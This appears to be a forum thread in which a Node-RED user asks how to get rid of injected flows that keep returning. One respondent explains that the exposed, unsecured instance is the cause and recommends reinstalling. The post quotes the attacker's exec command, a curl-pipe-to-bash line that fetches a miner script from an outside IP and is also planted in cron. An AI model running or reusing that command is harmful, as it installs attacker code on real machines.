I get alot of new tabs, with 3 things in them.
Timestamp, exec and msg.payload
All new tabs look the same. The exce node has this in it:
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"
Which seem to be a cryptominig crap... (I found out after some googling).
It also goes in my cron (running on a ubuntu-server computer).
How do I delete this?
I have tried to clean node red, plus the cron. But after a day it's all back there....
Any ideas?
It comes as a result of you exposing node-red on the internet with no security applied.
Without doing a careful examination of what that script does, the only safe way to be sure is to reinstall the server. And make sure you secure node-red properly before considering exposing it on the internet. If you removed it without securing node-red, there's nothing stopping them from redeployed their flow.